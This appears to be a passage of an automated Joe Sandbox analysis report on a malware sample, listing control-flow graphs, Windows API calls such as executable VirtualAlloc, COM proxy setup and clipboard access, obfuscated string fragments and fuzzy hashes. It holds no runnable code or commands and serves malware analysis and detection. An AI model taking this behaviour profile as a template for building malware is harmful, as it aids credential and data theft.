                                                                                                                                                                                                                                                      control_flow_graph 142 9e0e0f-9e0e24 SetErrorMode * 2 143 9e0e2b-9e0e2c 142->143 144 9e0e26 142->144 144->143
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,009E0223,?,?), ref: 009E0E19
                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,009E0223,?,?), ref: 009E0E1E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                      • Instruction ID: 518bfefd04ff1fa04a4c66aeaa9b8635698d5129f672d08a57038237baf20c59
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1D0123114512877D7012A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B0994046E5

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 322 43a950-43a961 323 43a976-43a988 call 43bf00 RtlReAllocateHeap 322->323 324 43a995-43a996 call 438e70 322->324 325 43a98a-43a993 call 438e30 322->325 326 43a968-43a96f 322->326 333 43a9a0-43a9a2 323->333 332 43a99b-43a99e 324->332 325->333 326->323 326->324 332->333
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      • Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                      • Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 334 43ab91-43aba8 GetForegroundWindow call 43c7d0 337 43abad-43abce 334->337
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                                                                                                                                      • Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                      • Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 339 438e70-438e7c 340 438e83-438e8e call 43bf00 RtlFreeHeap 339->340 341 438e94-438e95 339->341 340->341
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                                      • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                      • Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                      • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                      • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AC9C3E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AC9000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ac9000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                      • Instruction ID: 870202dd4240ffa3ca0193906c0237eb55016fd9fb009c276b50570e5888cf2c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71113F79A00208FFDB01DF98CA89E99BBF5AF08350F058094F9489B362D371EA50DF80
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                      • API String ID: 0-1394229784
                                                                                                                                                                                                                                                      • Opcode ID: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                      • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056a6b09ac1f0b8069d8e0856d928db892cc49fb58976f7f6017e888c085083b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                      • API String ID: 0-1394229784
                                                                                                                                                                                                                                                      • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                      • Instruction ID: 1027ff2855c550a88bad8858ab9eca3c3630c16712125cf5dab57785748b3bb4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC22462190D7E9C9EB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0BC9CB26
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                      • API String ID: 0-334816167
                                                                                                                                                                                                                                                      • Opcode ID: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                      • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d803b101157e4a712cc0ef110f4861eff536f857bbb1a7cf2d313a64b91ceb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                      • API String ID: 0-334816167
                                                                                                                                                                                                                                                      • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                      • Instruction ID: 92fd718f352f0b70188e1aa49ce52bf8fdd856b194c83b3ce30c15db1ee6280f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEF1D221D087E98ADB32C67C8C443CDBFA25B57324F1943D9D4E9AB3D2C6750A86CB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                                                                                                                                                      • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                      • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                      • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                      • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                      • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 00A16675
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(FA46F8B5), ref: 00A166D1
                                                                                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00A1670E
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(w!s#), ref: 00A16762
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(A3q5), ref: 00A16808
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00A1687A
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00A169DC
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00A16A1A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                      • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                      • API String ID: 2775254435-4124187736
                                                                                                                                                                                                                                                      • Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                      • Instruction ID: 41d09552acd15d54d16cba71eabe776d97155dbe28b8feef3179c46d9f8ba4a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0112CAB2A083409BD314CF69C881BABBBE6FFC5304F14892CE695DB291D774D945CB86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                      • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                      • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                      • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                      • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                      • API String ID: 0-2345621967
                                                                                                                                                                                                                                                      • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                      • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                                                                                                                                                                                                                      • API String ID: 0-2345621967
                                                                                                                                                                                                                                                      • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                      • Instruction ID: 926f17e53e34224369bae77689703f4da4d6ca3ff84278b2cff48c9b93de76a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96C1487150C3D58BD316CF2584A076BBFE1AFD2345F1889ACE4E11B782D6398D0ACB62
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                      • API String ID: 0-2174627302
                                                                                                                                                                                                                                                      • Opcode ID: fa95428c970c30a1efb578d72b7ddf9eb6b82f5b934b73145c579ff54d310729
                                                                                                                                                                                                                                                      • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa95428c970c30a1efb578d72b7ddf9eb6b82f5b934b73145c579ff54d310729
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                      • API String ID: 0-2174627302
                                                                                                                                                                                                                                                      • Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                      • Instruction ID: db2b60c0665985f60896efead43aae086abc2f9b37b6fd6b529f0f653e083fb4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D72AD7160C7818FC3259B38C4953AFBBE6ABC5314F198E2ED5DA87392D6798845CB03
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
